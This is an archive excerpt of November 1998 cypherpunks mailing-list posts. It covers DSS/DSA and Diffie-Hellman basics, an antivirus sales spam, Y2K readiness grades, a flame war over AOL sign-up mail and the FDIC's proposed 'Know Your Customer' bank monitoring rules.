all get RFC numbers for our respective systems.

   For instance using RSA public key encryption versus Deffie Helman public
key
   encryption. How about Digital Signature Standard (DSS)? I have red about
DSS and
   understand that DSS is the standard that provides the Digital Signature
   Algorithm. Before applying it there has to be calculated an Digest using
SHA. I
   always thought that calculating the digest would be the signature
already!! So
   why using the DSA in addition? Will the digest be decrypted using the
Deffie
   Helman private key? 

The issue of algorithm is orthogonal to message encoding. The PGP-S/MIME
question is really one of message encoding format. Each requires DSS, and
allows RSA.

The DSS (Digital Signature Standard) describes how to make a signature
using DSA (Digital Signature Algorithm) and SHA1 (Secure Hash Algorithm).
That's how they relate. You could (for example) use DSA with RIPEMD-160,
but it wouldn't be DSS because DSS specifies the hash algorithm you should
be using for the signature.

DSA is a signature-only algorithm. Consequently, you aren't doing a
"decryption" with it when you evaluate a signature. I recommend you look in
a crypto source book, like Schneier's "Applied Cryptography" or Menezes,
van Oorschot, and Vanstone's "Handbook of Applied Cryptography" for details
of how DSS is done. There is also source code available from a wide variety
of places.

   Users that apply Deffie Helman exchange their public values
   in order to derive an secret key that will be known at both party sides.
Is that
   secret key the private key used to encrypt message digests or is the
private key
   generated by the DSA algorithm?

Like I said, DSS has its own signature-only key. As for "Diffie-Hellman"
depending on the variant of DH you're using, you may or may not have an
actual key. Many real-time systems use ephemeral DH merely to exchange
symmetric keys. In OpenPGP, we use the Elgamal system for encryption.
S/MIME is using an X9.42 algorithm that is very close (if not identical) to
Elgamal.

   In PGP further exist key rings that contain the public keys of other
users? How
   does that work with X.509 Certificates that actually contain the public
key. If
   there has to be a public key revoked, it happens in the key ring. Would
it be
   possible to export that revoked certificate. If not the revoked public
key would
   resist only lokally.

Most systems, be they PGP or X.509, use something akin to a directory to
store certs, revocations, etc. Typically, these are HTTP or LDAP based
systems.

   Are there any differences/advantages between RSA and Deffie Helman?

Again, this is orthoganal to encoding, as these are merely algorithms. But
yes, of course. The security of RSA is based upon the difficulty of
factoring large numbers. Most people who toss around the term
"Diffie-Hellman" use it to cover an entire family of algorithms whose
security is all based on the difficulty of solving discrete logs. These
include DSA, X9.42, Schnorr, and Elgamal. They are all approximately of the
same strength.

There are also a wide variety of advantages and disadvantages. Frequently,
these are the same. For example, in RSA encryption and signatures are the
same, which is simple, but leads to some hygenic problems. A signature-only
system like DSA is less flexible, but easier to export, and enforces good
key hygene (meaning that it is bad practice to use the same key for
signatures as for encryption). I could go on with a discussion of all this,
but this thread is already off-topic for this mailing list. Feel free to
mail me privately or phone.
   
   You see I am very confused right now and I have the feeling that all my
security
   theories wount match with those used in PGP.

There are many good reasons for being confused. One of the most important
ones is that there really aren't a lot of differences between the systems.
They are all trying to solve the same problem, but each has a slightly
different slant to it.
   
   I really would appreciate it if there would be someone helping my to
remove all
   that dust of my mind...
   
   Thank you in advance

You're welcome.

	Jon   

-----
Jon Callas                                  jon@pgp.com
CTO, Total Network Security                 3965 Freedom Circle
Network Associates, Inc.                    Santa Clara, CA 95054
(408) 346-5860                              
Fingerprints: D1EC 3C51 FCB1 67F8 4345 4A04 7DF9 C2E6 F129 27A9 (DSS)
              665B 797F 37D1 C240 53AC 6D87 3A60 4628           (RSA)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Jud - US 5-200 Sales <usa150@mail.mcafee.com>
Date: Wed, 25 Nov 1998 16:18:04 +0800
To: cypherpunks@toad.com
Subject: NAI Special offers to expire Soon
Message-ID: <199811250730.XAA22029@mail.mcafee.com>
MIME-Version: 1.0
Content-Type: text/plain




Call Today 
To Receive A FREE Nuts & Bolt's '98 CD!


TOTAL VIRUS DEFENSE
THE NEXT GENERATION

Total Virus Defense (TVD) will be a truly integrated product line combining the best of Network Associates and Dr. Solomon's anti-virus technology.  The integration of Network Associates and Dr. Solomon's technologies will also yield the most compelling set of central management tools ever offered by a single anti-virus vendor.  Our new Total Virus Defense line will offer superior integrated solutions all three of the most critical virus management issues: Simple initial deployment of anti-virus products, Easy central configuration by domain or individual machine, and a Fully automated update and upgrade process. 




VirusScan 4.0
Proven VirusScan interface already in use by over 40 million customers worldwide
Fully integrated new detection and cleaning engine based on Dr. Solomon's technology and currently in use by over 10 millions customers worldwide
Support for Management Edition, AutoUpdate, and Enterprise SecureCast
Malicious code scanning for hostile Java, ActiveX and Trojan Horse threats
Initial platform support for Windows 3.1x, 95, 98, and OS/2
Initial support for the upcoming Active Virus Security immune system to be unveiled in1999
Dr. Solomon's outstanding Virex product has been selected as the new Network Associates product for Macintosh systems.  This product ships with Virex Administration for easy centralized configuration and automated network distribution.

CALL TODAY TO AVOID THE PRICE INCREASE AT THE END OF NOVEMBER!

At Network Associates,
We Are Committed To Making Your Organization More Productive
And Your Network More Manageable And Secure.
 
In the Phillipines call:
NEXUS (632)759 6630 and ask for Melody, Jenny or Joey

Or ICS (632)721 4502 and ask for Mona

In Malaysia call: MCSB Systems (M)Bhd at +603-241-6922 and ask for
Lilly or Tele-Sales

or Persoft Systems Sdn Bhd at +603-711-8711 and ask for
Leong King Ping/Lim Soe Cheng

In Singapore call Iverson Computer Associates Pte Ltd at
+65-378-7116 and ask for Herni

or Worldtech Technologies Pte Ltd at +65-352-1955 and ask for
Angie





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Burnes - Denver <jim.burnes@ssds.com>
Date: Wed, 25 Nov 1998 16:18:07 +0800
To: Anonymous <nobody@nowhere.to>
Subject: Re: Y2K Report Card
In-Reply-To: <50a20d7167d9f00b008bf7c81c8b6ee0@anonymous>
Message-ID: <Pine.SOL.3.91.981125003651.16951A-100000@denver>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 25 Nov 1998, Anonymous wrote:

> Date: Wed, 25 Nov 1998 13:55:01 +0900 (JST)
> From: Anonymous <nobody@nowhere.to>
> To: cypherpunks@cyberpass.net
> Subject: Y2K Report Card
> 
> AGENCIES GET NEW REPORT CARDS ON Y2K READINESS
> 
> 
> Saying "the picture is a gloomy one," Congressman 
> Stephen Horn, chair of the House subcommittee 
> responsible for overseeing government progress on
> averting the Y2K problem, has given out new report 
> cards to federal agencies.  Three departments 
> flunked:  Justice; Health & Human Services; and 
> State.

Wonder what the implications of this are?

>  The Defense Department gets a D-minus.  

So this means they flunked too.  Since having the
DOD non compliant could be a national security risk.
That means they flunked, but we couldn't say so.

How many nukes are going to be checking the number
of days since they last talked to launch control?
What are the chances they are date sensitive?
What happens if they should lose contact for 
greater than a certain number of days?  Do they
assume we've been nuked? How about the russians?
The Chinese?  What if the entire US DOD C&C network
goes down.  Is it an EMP?  Is it infowar?  Is it
Y2K?

> Three departments get A grades:  Small Business 
> Administration;  Social Security Administration;
> and the National Science Foundation.

Was this graded on a curve? ;-O

I thought SSA was still two years off target.

>  The Social 
> Security Administration began working on the 
> problem in 1989, eight years before most other 
> government agencies. 
> 

This A/B/C/D/F stuff worked in school, but on a
complex remediation effort doesn't really mean
anything.

Is that an 'A' for effort?

jim





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 25 Nov 1998 08:37:45 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Limit on number of primes....a (stupid) idiot...
Message-ID: <199811250002.BAA20907@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate is so stupid that even when he accidentally gets something
right, he quickly "corrects" himself so that he is wrong again:

> I had typed x/ln(x) as the asymptotic limit for the number of primes less
> than x.
> 
> This is incorrect. It should be,
> 
> x/log(x)

Wrong, doofus.  x/ln(x) is the correct asymptotic limit.  What role could
logs to the base 10 possibly play?  Do you think God favors the number 10?
What a fool you are!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 25 Nov 1998 11:13:09 +0800
To: Netscape AOL Instant Messenger <security@aol.com
Subject: Re: Netscape AOL Instant Messenger Confirmation (kB3bEjeb1I aohelsux)
Message-ID: <199811250241.DAA01847@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



This does wonders for my opinion of AOL. Even the administration has no clue.

AOL administration spammed the Cypherpunks <cypherpunks@toad.com> list, using
an address for Cypherpunks which has been defunct for over a year now, with:

>Thank you for registering for Netscape AOL Instant Messenger!
>
>Your registration for screen name aohelsux has been received.
>
>Please reply to this message within 48 hours to complete
>the registration process.  Simply reply to the present message
>and type 'OK' as the text of your message.

P.S. "Well they just responded to an address someone gave them," like
certain advocates of AOL, lamers, and Microsoft we have on the list have
said, is not an excuse. It's easy to set up domain validation. The spammers
just don't care.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: HyperReal-Anon <nobody@sind.hyperreal.art.pl>
Date: Wed, 25 Nov 1998 12:58:22 +0800
To: cypherpunks@toad.com
Subject: Netscape AOL Instant Messenger Confirmation (kB3bEjeb1I aohelsux)
Message-ID: <6ece424b07b03e6b239e826cfb06531d@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



>Thank you for registering for Netscape AOL Instant Messenger!

Hey Tim, do you have a spare semi-auto I can borrow? You'll get it back
if AOL's security is as low as their intelligence.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lcs Mixmaster Remailer <mix@anon.lcs.mit.edu>
Date: Wed, 25 Nov 1998 14:01:24 +0800
To: "paul h. merrill" <cypherpunks@EINSTEIN.ssz.com
Subject: Re: Re: Netscape AOL Instant Messenger Confirmation (kB3bEjeb1I aohels
Message-ID: <19981125052004.20490.qmail@nym.alias.net>
MIME-Version: 1.0
Content-Type: text/plain



Do you even bother to read the posts you try to flame? Read the last part of
that.

Paul H. Merrill wrote:
>
>Again, some clueless asshole that can't tell the difference between
>solicited responses and Unsolicited spam mouths off.  If you would like
>to talk about someone, talk about the jerk who set up an AIM name using
>the outdated address, not the company that repsonded.
>
>PHM
>
>AKA PHMerrill@AOL.Com (among other names and addresses)
>
>Anonymous wrote:
>>
>> This does wonders for my opinion of AOL. Even the administration has no clue.
>>
>> AOL administration spammed the Cypherpunks <cypherpunks@toad.com> list, using
>> an address for Cypherpunks which has been defunct for over a year now, with:
>>
>> >Thank you for registering for Netscape AOL Instant Messenger!
>> >
>> >Your registration for screen name aohelsux has been received.
>> >
>> >Please reply to this message within 48 hours to complete
>> >the registration process.  Simply reply to the present message
>> >and type 'OK' as the text of your message.
>>
>> P.S. "Well they just responded to an address someone gave them," like
>> certain advocates of AOL, lamers, and Microsoft we have on the list have
>> said, is not an excuse. It's easy to set up domain validation. The spammers
>> just don't care.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 25 Nov 1998 13:37:49 +0800
To: security@aol.com
Subject: Re: Netscape AOL Instant Messenger Confirmation (kB3bEjeb1I aohelsux)
Message-ID: <199811250510.GAA13692@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



>Again, some clueless asshole that can't tell the difference between
>solicited responses and Unsolicited spam mouths off.  If you would like
>to talk about someone, talk about the jerk who set up an AIM name using
>the outdated address, not the company that repsonded.
>
>PHM
>
>AKA PHMerrill@AOL.Com (among other names and addresses)

Again, the clueless asshole known as Paul *H.* Merrill jumps up and defends
AOL, incompetently-written web sites, and morons everywhere.

Someone told AOL to mail cypherpunks@toad.com. AOL could have checked to see
if the originating site was under the toad.com domain. This is trivial. They
didn't. It's rather easy to just require that somebody trying to mail an
address under the toad.com domain submit the request from an address under
toad.com. 

In other words, Paul, you believe that if somebody goes and types your
address into some system and asks it to send you 512MB of MPEG video, that's
okay because it was solicited. It wasn't solicited by you but somebody
solicited it.

Oops. That's "blatent propoganda." I'd better rephrase. In other words,
Paul, you believe that if somebody goes and types YOUR address into fifty
different systems, signs you up for a bunch of mailing lists, and generally
causes you a lot of inconvenience, that's okay because it was solicited. You
don't know who it was solicited by, but somebody obviously did. If you then
object to the sites sending you mail rather than just silently
unsubscribing yourself every week, are you then just 'some clueless asshole'?

Are spammers now not to be held accountable for their spamming because they
bought a list of addresses from someone who claimed that the people all
asked to be on the mailing list?

Why don't we just sign Cypherpunks up for Ignition-Point, the FP list, the 
ACLU action advisories, Sixdegrees, and whatever else we can find? Or should
We just sign up Paul, really, because he doesn't have a problem with this. 
In fact I'm sure we could make some 'marketting research' to show that he 
might be interested. Hey let's get the entire CDR subscription list and
sign everybody up for FP and ACLU because if you're on Cypherpunks you're
obviously interested in those things.

The root of the problem is sites which require email addresses for no good
reason, and/or don't have the decency to perform a simple check to see if
the domains match. They're lazy. They're irresponsible. When confronted, no
matter how civil, they react much like you do, Paul, and they don't want to
be inconvenienced by having to fix their usually badly-designed web sites.

If I recall correctly Tim has the same opinion and has stated it a few
times as have others so I'm not alone.

Now I leave you, Paul, so you can go back to your 24 hour vigil and you and
your quick response team can scour the net for attacks against AOL and the
true clueless assholes, and defend them with your last breath.

Yet Another 'Clueless Asshole'





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ken Williams <jkwilli2@unity.ncsu.edu>
Date: Wed, 25 Nov 1998 22:28:35 +0800
To: cypherpunks@toad.com
Subject: [ISN] Feds Want Banks to Spy on All Customers...Even You!   (fwd)
Message-ID: <Pine.SOL.4.05.9811250823220.19063-100000@c00985-224wi.eos.ncsu.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----


Good thing I keep all my money in a steel case buried somewhere
along the Appalachian trail.  No bank accounts, no credit cards.

Ken Williams

Packet Storm Security        http://www.Genocide2600.com/~tattooman/
E.H.A.P. Head of Operations  http://www.ehap.org/   ehap@ehap.org
NC State CS Dept  http://www.csc.ncsu.edu/   jkwilli2@unity.ncsu.edu
PGP DSS/DH/RSA Keys          http://www4.ncsu.edu/~jkwilli2/pgpkey/

_____________________________________________________________
Get Your Private, Free, Encrypted Email at http://www.nsa.gov


- ---------- Forwarded message ----------
Date: Wed, 25 Nov 1998 00:56:41 -0700 (MST)
From: mea culpa <jericho@dimensional.com>
To: InfoSec News <isn@repsec.com>
Subject: [ISN] Feds Want Banks to Spy on All Customers...Even You!  


>From: ISPI Clips 6.51
>From: WorldNetDaily, November 23, 1998

Big Brother Banks? FDIC has snooping plans
http://www.worldnetdaily.com/bluesky_exnews/19981123_xex_big_brother_.shtml
David M. Bresnahan, David@talkusa.com
Contributing Editor, WorldNetDaily

Are you a potential criminal? Are you a threat to banks, airlines, a
potential spy, or perhaps an IRS tax protester? The government would like
to know and they are about to force banks to be their detectives. 

The federal government wants banks to investigate you. Soon your banker
will know more about you than anyone else in town. Banks must not only
determine your correct identity, they must also know how you make your
money, and how you spend it. Once you establish a pattern of deposits and
withdrawals, banks must inform federal agencies when you deviate. 

Bank customers may soon find themselves explaining to the FBI, Internal
Revenue Service, and the Drug Enforcement Agency why they made a $15,000
deposit to their bank account. According to current Federal Deposit
Insurance Corporation plans, banks will soon establish "profiles" of their
customers and report deviations from those profiles. 

If you sell a car, for example, and place the proceeds in your account
while you shop for a new one, a red flag may go off in the bank computer. 
Such a situation puts law abiding citizens in a situation where they must
prove they are innocent, says Scott McDonald of the watchdog group Fight
the Fingerprint. 

An uproar from grass roots Americans is the only thing that will stop the
current plans for the FDIC "Know Your Customer" program, according to
McDonald. His organization has led the charge against the national ID,
medical ID, and computerized information about private aspects of people's
lives. 

A recent announcement by the FDIC provides for citizen comment prior to
implementation of their new banking regulations. The deadline for comments
is Dec. 27, 1998. 

"The FDIC is proposing to issue a regulation requiring insured nonmember
banks to develop and maintain 'Know Your Customer' programs," according to
a recent FDIC information package sent to Congress to provide notice of
proposed rulemaking, and to banks for comment. 

"As proposed," the 29-page FDIC document begins, "the regulation would
require each nonmember bank to develop a program designed to determine the
identity of its customers; determine its customers' source of funds; 
determine the normal and expected transactions of its customers; monitor
account activity for transactions that are inconsistent with those normal
and expected transactions; and report anytransactions of its customers
that are determined to be suspicious, in accordance with the FDIC's
existing suspicious activity reporting regulation. By requiring insured
nonmember banks to determine the identity of their customers, as well as
to obtain knowledge regarding the legitimate activities of their
customers, the proposed regulation will reduce the likelihood that insured
nonmember banks will become unwitting participants in illicit activities
conducted or attempted by their customers. It will also level the playing
field between institutions that already have adopted formal 'Know Your
Customer' programs and those that have not." 

Many banks across the country have already begun to implement such
programs, according to the FDIC. A quick search of the Internet found many
stories in press accounts of problems reported at such banks. There have
been a number of stories dealing with banks requiring fingerprints to open
accounts and to cash checks. There are several lawsuits presently underway
testing the right of banks to make that requirement. 

McDonald has been fighting that issue, along with fingerprints on driver's
licenses for some time. He pointed out the many errors found on credit
reports and suggested that banks will soon make similar errors when they
begin creating profiles of their customers. 

The FDIC is selling the planned regulations by pointing out the need for
prevention of financial and other crime. 

"By identifying and, when appropriate, reporting such transactions in
accordance with existing suspicious activity reporting requirements,
financial institutions are protecting their integrity and are assisting
the efforts of the financial institution regulatory agencies and law
enforcement authorities to combat illicit activities at such
institutions,"  says the FDIC. 

The proposed regulation is, according to FDIC spokesperson Carol A. 
Mesheske, authorized by current law. It comes from the statutory authority
granted the FDIC under section 8(s)(1) of the Federal Deposit Insurance
Act (12 U.S.C. 18189s)(1), as amended by section 259(a)(2) of the Crime
Control Act of 1990 (Pub. L. 101-647). 

The FDIC claims that the law requires them to develop regulations to
require banks to "establish and maintain internal procedures reasonably
designed to ensure and monitor compliance with the Bank Secrecy Act. 
Effective 'Know Your Customer' programs serve to facilitate compliance
with the Bank Secrecy Act." 

The proposed regulations will mandate that all banks insured by the FDIC
must maintain an intelligence gathering department that screens out
customers and keeps an eye on existing customers. Before you decide to
move your money to a credit union, you should know that the FDIC is not
the only federal organization making such plans. 

"Each of the other Federal bank supervisory agencies is proposing to adopt
substantially identical regulations covering state member and national
banks, federally-chartered branches and agencies of foreign banks, savings
associations, and credit unions. There also have been discussions with the
Federal regulators of non-bank financial institutions, such as
broker-dealers, concerning the need to propose similar rules governing the
activities of these non-bank institutions," reports FDIC attorney Karn L. 
Main in the proposal. 

The purposes for the regulation are to protect the reputation of the
banks, to facilitate compliance with the law, to improve safe and sound
banking practices, and to protect banks from being used by criminals as a
vehicle for illegal activities. 

Current customers will be subjected to the new regulation in the same way
new customers will be scrutinized. The FDIC does not wish to permit any
loop hole which would leave any bank customer unidentified or
unsupervised. 

Each bank will create profiles. The first profile will determine the
amount of risk a potential customer might present by opening an account.
The system of profiling potential customers will be different from one
bank to the next, since the FDIC does not provide a uniform program. The
purpose of the profile is to identify potential customers who might use a
bank account for funds obtained through criminal activity. 

The next profile will be one that is used by automated computers to
determine when suspicious activity is taking place in an account. When
activity in the account does not fit the profile, banks will notify
federal authorities so they can investigate. 

Banks are expected to identify their customers, determine normal and
expected transactions, monitor account transactions, and determine if a
particular transaction should be reported. 

The FDIC has sent copies of the proposal to all banks and is asking for
input. The questions asked by the FDIC in the proposal do not




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank Brueckner <Frank.Brueckner@mch.sni.de>
Date: Wed, 25 Nov 1998 16:19:58 +0800
To: cypherpunks@cyberpass.net
Subject: Re: OpenPGP / S/MIME Interoperability
In-Reply-To: <199811242259.WAA04469@server.eternity.org>
Message-ID: <365BB786.4C2E2448@mch.sni.de>
MIME-Version: 1.0
Content-Type: text/plain



Adam Back reported that Jon Callas wrote: 
 
> [...] there is no reason why you can't have PGP 
> messages backed by X.509 certificates, and it is trivial to use S/MIME 
> with OpenPGP certificates.  I'm planning on writing a short 
> informational RFC on how to do it once we all get RFC numbers for our 
> respective systems. 
 
It wouldn't be bad to include this activity in the discussion hosted by 
<pgp-directory@dante.net>. 
 
Am I right ? 
 
 
Regards 
 
  Frank Brckner 
  Siemens Information and Communication Networks 
  Directory Team     http://www.siemensmeta.com/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Wed, 25 Nov 1998 23:57:01 +0800
To: jkwilli2@unity.ncsu.edu (Ken Williams)
Subject: Re: [ISN] Feds Want Banks to Spy on All Customers...Even You!   (fwd)
In-Reply-To: <Pine.SOL.4.05.9811250823220.19063-100000@c00985-224wi.eos.ncsu.edu>
Message-ID: <199811251500.JAA10213@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



Ken Williams wrote:
> 
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> 
> Good thing I keep all my money in a steel case buried somewhere
> along the Appalachian trail.  No bank accounts, no credit cards.

That may be good, but your decision is not costless. You are losing
all the interest that could accrue on the money and it is constantly
diminished by inflation.

Is it worth it? It's your call, but I do not see what you do as something
that is unquestionably wise.

igor

> Ken Williams
> 
> Packet Storm Security        http://www.Genocide2600.com/~tattooman/
> E.H.A.P. Head of Operations  http://www.ehap.org/   ehap@ehap.org
> NC State CS Dept  http://www.csc.ncsu.edu/   jkwilli2@unity.ncsu.edu
> PGP DSS/DH/RSA Keys          http://www4.ncsu.edu/~jkwilli2/pgpkey/
> 
> _____________________________________________________________
> Get Your Private, Free, Encrypted Email at http://www.nsa.gov
> 
> 
> - ---------- Forwarded message ----------
> Date: Wed, 25 Nov 1998 00:56:41 -0700 (MST)
> From: mea culpa <jericho@dimensional.com>
> To: InfoSec News <isn@repsec.com>
> Subject: [ISN] Feds Want Banks to Spy on All Customers...Even You!  
> 
> 
> >From: ISPI Clips 6.51
> >From: WorldNetDaily, November 23, 1998
> 
> Big Brother Banks? FDIC has snooping plans
> http://www.worldnetdaily.com/bluesky_exnews/19981123_xex_big_brother_.shtml
> David M. Bresnahan, David@talkusa.com
> Contributing Editor, WorldNetDaily
> 
> Are you a potential criminal? Are you a threat to banks, airlines, a
> potential spy, or perhaps an IRS tax protester? The government would like
> to know and they are about to force banks to be their detectives. 
> 
> The federal government wants banks to investigate you. Soon your banker
> will know more about you than anyone else in town. Banks must not only
> determine your correct identity, they must also know how you make your
> money, and how you spend it. Once you establish a pattern of deposits and
> withdrawals, banks must inform federal agencies when you deviate. 
> 
> Bank customers may soon find themselves explaining to the FBI, Internal
> Revenue Service, and the Drug Enforcement Agency why they made a $15,000
> deposit to their bank account. According to current Federal Deposit
> Insurance Corporation plans, banks will soon establish "profiles" of their
> customers and report deviations from those profiles. 
> 
> If you sell a car, for example, and place the proceeds in your account
> while you shop for a new one, a red flag may go off in the bank computer. 
> Such a situation puts law abiding citizens in a situation where they must
> prove they are innocent, says Scott McDonald of the watchdog group Fight
> the Fingerprint. 
> 
> An uproar from grass roots Americans is the only thing that will stop the
> current plans for the FDIC "Know Your Customer" program, according to
> McDonald. His organization has led the charge against the national ID,
> medical ID, and computerized information about private aspects of people's
> lives. 
> 
> A recent announcement by the FDIC provides for citizen comment prior to
> implementation of their new banking regulations. The deadline for comments
> is Dec. 27, 1998. 
> 
> "The FDIC is proposing to issue a regulation requiring insured nonmember
> banks to develop and maintain 'Know Your Customer' programs," according to
> a recent FDIC information package sent to Congress to provide notice of
> proposed rulemaking, and to banks for comment. 
> 
> "As proposed," the 29-page FDIC document begins, "the regulation would
> require each nonmember bank to develop a program designed to determine the
> identity of its customers; determine its customers' source of funds; 
> determine the normal and expected transactions of its customers; monitor
> account activity for transactions that are inconsistent with those normal
> and expected transactions; and report anytransactions of its customers
> that are determined to be suspicious, in accordance with the FDIC's
> existing suspicious activity reporting regulation. By requiring insured
> nonmember banks to determine the identity of their customers, as well as
> to obtain knowledge regarding the legitimate activities of their
> customers, the proposed regulation will reduce the likelihood that insured
> nonmember banks will become unwitting participants in illicit activities
> conducted or attempted by their customers. It will also level the playing
> field between institutions that already have adopted formal 'Know Your
> Customer' programs and those that have not." 
> 
> Many banks across the country have already begun to implement such
> programs, according to the FDIC. A quick search of the Internet found many
> stories in press accounts of problems reported at such banks. There have
> been a number of stories dealing with banks requiring fingerprints to open
> accounts and to cash checks. There are several lawsuits presently underway
> testing the right of banks to make that requirement. 
> 
> McDonald has been fighting that issue, along with fingerprints on driver's
> licenses for some time. He pointed out the many errors found on credit
> reports and suggested that banks will soon make similar errors when they
> begin creating profiles of their customers. 
> 
> The FDIC is selling the planned regulations by pointing out the need for
> prevention of financial and other crime. 
> 
> "By identifying and, when appropriate, reporting such transactions in
> accordance with existing suspicious activity reporting requirements,
> financial institutions are protecting their integrity and are assisting
> the efforts of the financial institution regulatory agencies and law
> enforcement authorities to combat illicit activities at such
> institutions,"  says the FDIC. 
> 
> The proposed regulation is, according to FDIC spokesperson Carol A. 
> Mesheske, authorized by current law. It comes from the statutory authority
> granted the FDIC under section 8(s)(1) of the Federal Deposit Insurance
> Act (12 U.S.C. 18189s)(1), as amended by section 259(a)(2) of the Crime
> Control Act of 1990 (Pub. L. 101-647). 
> 
> The FDIC claims that the law requires them to develop regulations to
> require banks to "establish and maintain internal procedures reasonably
> designed to ensure and monitor compliance with the Bank Secrecy Act. 
> Effective 'Know Your Customer' programs serve to facilitate compliance
> with the Bank Secrecy Act." 
> 
> The proposed regulations will mandate that all banks insured by the FDIC
> must maintain an intelligence gathering department that screens out
> customers and keeps an eye on existing customers. Before you decide to
> move your money to a credit union, you should know that the FDIC is not
> the only federal organization making such plans. 
> 
> "Each of the other Federal bank supervisory agencies is proposing to adopt
> substantially identical regulations covering state member and national
> banks, federally-chartered branches and agencies of foreign banks, savings
> associations, and credit unions. There also have been discussions with the
> Federal regulators of non-bank financial institutions, such as
> broker-dealers, concerning the need to propose similar rules governing the
> activities of these non-bank institutions," reports FDIC attorney Karn L. 
> Main in the proposal. 
> 
> The purposes for the regulation are to protect the reputation of the
> banks, to facilitate compliance with the law, to improve safe and sound
> banking practices, and to protect banks from being used by criminals as a
> vehicle for illegal activities. 
> 
> Current customers will be subjected to the new regulation in the same way
> new customers will be scrutinized. The FDIC does not wish to permit any
> loop hole which would leave any bank customer unidentified or
> unsupervised. 
> 
> Each bank will create profiles. The first profile will determine the
> amount of risk a potential customer might present by opening an account.
> The system of profiling potential customers will be different from one
> bank to the next, since the FDIC does not provide a uniform program. The
> purpose of the profile is to identify potential customers who might use a
> bank account for funds obtained through criminal activity. 
> 
> The next profile will be one that is used by automated computers to
> determine when suspicious activity is taking place in an account. When
> activity in the account does not fit the profile, banks will notify
> federal authorities so they can investigate. 
> 
> Banks are expected to identify their customers, determine normal and
> expected transactions, monitor account transactions, and determine if a
> particular transaction should be reported. 
> 
> The FDIC has sent copies of the proposal to all banks and is asking for
> input. The questions asked by the FDIC in the proposal do not
> 



	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Thu, 26 Nov 1998 02:15:17 +0800
To: cypherpunks@toad.com
Subject: Re: [ISN] Feds Want Banks to Spy on All Customers...Even You! (fwd)
Message-ID: <365C3CDB.6F34@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



I spotted the *rhetorical* steel case in the first note.

The disturbing thing here is the requirement to report deviations from a
pattern. That is where it becomes a NaziReptilianProctoscope$ystem. It's
my fucking money, I can do whatever the fuck I want with it, whenever
the fuck I want to. I wish those fuckers would look at the Fourth
Amendment. 

The structuring stuff looks like it could get pretty wierd: how I move
my money should not matter but maybe it does.

Why do reptiles have such a bad name? Some of my favorite politicians
are reptiles. 

BTW - the FDIC site state that there is no statutory requirement for a
'Know Your Customer' system. You could also say that they are not
interested in little guys, that they need this stuff to do their job,
but if the laws are written so that anyone can be targeted without a
warrant then there is a *big* problem. Especially worrisome is automated
pattern analysis without a warrant - a violation of the 4th.

So, what are the alternatives to keeping your money in a standard
financial institution? 

Seems to me that keeping it at home is pretty risky - eventually some
low-life will figure it out and then you'll have to choose between your
cash and your left nut.

Keeping it all tied up in goods is not any bargain either. A small
fraction perhaps...

Mike

>From the FDIC site.

Pardon the formatting - it's straight from the .gov.

************************************************************************
http://www.fdic.gov/search97cgi/s97_cgi.exe?action=View&VdkVgwKey=http%3A%2F%2Fwww%2Efdic%2Egov%2Fbanknews%2Fmanuals%2Fexampoli%2F98FINREC%2Ehtm&DocOffset=1&DocsFound=11&QueryZip=know+your+customer&Collection=www&SortField=Score&SortOrder=Desc&SearchUrl=http%3A%2F%2Fwww%2Efdic%2Egov%2Fsearch97cgi%2Fs97%5Fcgi%2Eexe%3Faction%3DFilterSearch%26QueryZip%3Dknow%2Byour%2Bcustomer%26Filter%3Dfilters%252Fallwww%252Ehts%26ResultTemplate%3Dfdic%252Ehts%26QueryText%3Dknow%2Byour%2Bcustomer%26Collection%3Dwww%26SortField%3DScore%26SortOrder%3DDesc%26ResultStart%3D1%26ResultCount%3D25&ViewTemplate=view%2Ehts&ServerKey=Primary&AdminImagePath=&Theme=Power&Company=FDIC


"Know> <Your> <Customer>"
                  Policy

                  One of the most important, if not the most important
means by which financial
                  institutions can hope to avoid criminal exposure to
the institution from customers who
                  use the resources of the institution for illicit
purposes is to have a clear and concise
                  understanding of each customer's practices. The
adoption of "<know> <your>
                  <customer>" guidelines or procedures by financial
institutions has proven extremely
                  effective in detecting suspicious activity by
customers of the institution in a timely
                  manner. 

                  Even though not required by regulation or statute, it
is imperative that financial
                  institutions adopt "<know> <your> <customer>"
guidelines or procedures to enable
                  the immediate detection and identification of
suspicious activity at the institution. The
                  concept of "<know> <your> <customer>" is, by design,
not explicitly defined so
                  that each institution can adopt procedures best suited
for its own operations. An
                  effective "<know> <your> <customer>" policy must, at a
minimum, contain a clear
                  statement of management's overall expectations and
establish specific line
                  responsibilities. While the officers and staff of
smaller banks may have more frequent
                  and direct contact with customers than their
counterparts in large urban institutions, it
                  is incumbent upon all institutions to adopt and follow
policies appropriate to their size,
                  location, and type of business. 

                  Objectives Of "<Know> <Your> <Customer>"
                  Policy

                    1.A "<know> <your> <customer>" policy should
increase the likelihood the
                       financial institution is in compliance with all
statutes and regulations and adheres
                       to sound and recognized banking practices. 
                    2.A "<know> <your> <customer>" policy should
decrease the likelihood the
